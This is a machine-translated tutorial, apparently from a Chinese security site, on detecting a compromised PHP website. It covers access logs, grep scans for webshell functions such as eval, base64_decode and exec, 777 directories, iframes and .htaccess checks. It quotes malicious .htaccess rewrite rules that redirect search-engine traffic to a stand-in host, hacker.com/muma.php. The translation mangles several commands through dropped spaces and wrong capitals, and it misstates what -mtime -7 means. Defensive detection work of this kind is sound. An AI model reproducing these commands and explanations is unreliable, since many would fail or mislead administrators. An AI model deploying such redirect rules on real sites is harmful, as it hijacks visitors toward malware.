Original address: http://drops.wooyun.org/web/2718 Category: Web security
(This article focuses on using system commands)
First, view the access log
See if there is a file upload operation (POST method),
[Plain]View PlainCopy
- Ipremoved--[01/mar/2013:06:16:48-0600] "post/uploads/monthly_10_2012/view.php http/1.1"-"Mozilla/5.0"
- Ipremoved--[01/mar/2013:06:12:58-0600] "post/public/style_images/master/profile/blog.php HTTP/1.1" 200 36 "-" " mozilla/5.0 "
The log format of the Nginx default record is:
[Plain]View PlainCopy
- Access_log Logs/access.log
Or
[Plain]View PlainCopy
- Access_log Logs/access.log combined;
The location of the default logging for Nginx is:
Nginx installation directory/log/
Second, look for files containing malicious PHP code
2.1 Finding recently changed PHP files
[Plain]View PlainCopy
- Find. -type f-name ' *.php '-mtime-7
-type F means a search for normal files-mtime-7 the files that are modified within the hour
The results may be as follows:
./uploads/monthly_04_2008/index.php
./uploads/monthly_10_2008/index.php
./uploads/monthly_08_2009/template.php
./uploads/monthly_02_2013/index.php
2.2 Find out if there is a suspect code in the file
[Plain]View PlainCopy
- Find. -type f-name ' *.php ' | Xargs grep-l "eval * ("--color
(* represents any space)
[Plain]View PlainCopy
- find . -type f -name ' *.php ' | xargs grep -l "base64_decode * ("  --COLOR  
- Find . -type f -name ' *.php ' | xargs grep -l gzinflate * (" --color
- find . -type f -name ' *. php ' | xargs grep -l ' eval * (str_rot13 * (base64_decode * (" -- color
Note: Many commands do not support pipeline pass parameters, and actually need this, so use the Xargs command, this command can be used to pass parameters of the pipeline, Grep-l represents only the file name of a string, if you remove-l will display the line content matching a particular string
The meaning of several special strings: eval () executes the string according to PHP code, is the most common PHP word trojan
Base64_decode () decodes the string base64, payload is Base64 encoded when attacking, this function is useful.
Gzinflate () The string decompression processing, when the attack payload with gzdeflate compression, use this function to decompress
STR_ROT13 () encodes a string rot13
You can also use regular expressions to search for files to find code:
[Plain]View PlainCopy
- Find. -type f-name ' *.php ' | Xargs egrep-i "(mail|fsockopen|pfsockopen|stream\_socket\_client|exec|system|passthru|eval|base64_decode) * ("
The following explains the functions commonly used by Webshell:
Mail (): Can be used to send spam messages to site users
Fsockopen (): Open a network connection or a UNIX socket connection that can be used to payload send remote requests
Pfsockopen (): Similar to Fsockopen ()
Stream_socket_client (): Establish a remote connection, as in the following example:
[PHP]View PlainCopy
- <?php
- $fp = stream_socket_client ("tcp://www.example.com:80", $errno, $errstr, 30);
- if (! $fp ) {
- Echo "$errstr ($errno) <br/>\n";
- } Else {
- Fwrite ($fp, "get/http/1.0\r\nhost:www.example.com\r\naccept: */*\r\n\r\n");
- while (! feof ($fp)) {
- Echo fgets($fp, 1024);
- }
- Fclose ($fp);
- }
- ?>
EXEC (): Command execution function
System (): With exec ()
PassThru (): With exec ()
Preg_replace () The regular expression is decorated by the modifier "E", the replacement string needs to be executed in accordance with PHP code before replacing it, and this situation also needs to be taken into account in this case, the following scan can be used:
[Plain]View PlainCopy
- Find. -type f-name ' *.php ' | Xargs egrep-i "Preg_replace *\ ([' |\ ']) (.). *\2[a-z]*e[^\1]*\1 *, "--color
Third, compare code files
This situation requires a clean code, which is compared to the code being used. For example
[Plain]View PlainCopy
- Diff-r wordpress-clean/wordpress-compromised/-X wp-content
The above example compares the wordpress-clean/and wordpress-comprised/two directories, and the wp-content/subdirectory in the directory does not compare
Iv. Search for writable directories
See if there are any suspicious files in this directory, the following script looks for a directory with permissions of 777 for PHP files
[Plain]View PlainCopy
- search_dir=$ (PWD)
- writable_dirs=$ (Find $search _dir-type d-perm 0777)
- For dir in $writable _dirs
- Do
- #echo $dir
- Find $dir-type f-name ' *.php '
- Done
Hackers often insert PHP code into a JPG file, so you should also query for JPG files when querying these directories:
[Plain]View PlainCopy
- Find Wp-content/uploads-type f-iname ' *.jpg ' | Xargs grep-i PHP
Note:-iname indicates that the file name is case-insensitive grep-i also means case insensitive
V. Detection of IFRAME tags
Hackers often do is to embed the IFRAME tag, so you can view the source code of the Web page, and search for the presence of an IFRAME tag, you can use the following command:
[Plain]View PlainCopy
- Grep-i ' <iframe ' mywebsite.txt
For dynamically generated pages, you can use the FF live HTTP headers plugin to download to the source and find out if there is an IFRAME tag
Vi. finding sensitive strings in the database
including%base64_%,%eval (%<, etc. mentioned above some of the key words
Vii. checking. htaccess file
If Auto_prepend_file and Auto_append_file are included, use the following command
[Plain]View PlainCopy
- Find. -type f-name ' \.htaccess ' | Xargs grep-i Auto_prepend_file
- Find. -type f-name ' \.htaccess ' | Xargs grep-i Auto_append_file
Auto_prepend_file's role is to load the current script file before loading the PHP script auto_append_file the role of loading the current script file, then load the PHP script. If the hacker modifies the. htaccess file, you can load the malicious script that you want to load when you access the PHP script for the. htaccess directory.
The htaccess file can also be used to hijack the website traffic to the hacker's website,
[Plain]View PlainCopy
- Rewritecond%{http_user_agent}^.*baiduspider.*$
- Rewriterule ^ (. *) $ http://www.hacker.com/muma.php [r=301]
Redirect The visit of the Baidu Crawler to the hacker's website (contains http_user_agent and HTTP keywords)
[Plain]View PlainCopy
- Rewritecond%{http_referer} ^.*baidu.com.*$ rewriterule ^ (. *) $ http://www.hacker.com/muma.php [r=301]
REDIRECT traffic from the Baidu search engine to the hacker's website (containing http_referer and HTTP keywords) in order to see if the site is being htaccess modified to cause traffic hijacking, you can use the following command when searching for. htaccess files:
[Plain]View PlainCopy
- Find. -type f-name ' \.htaccess ' | Xargs grep-i http;
- Find. -type f-name ' \.htaccess ' | Xargs Grep-i http_user_agent;
- Find. -type f-name ' \.htaccess ' | Xargs grep-i Http_referer
Methods to detect if a PHP site has been compromised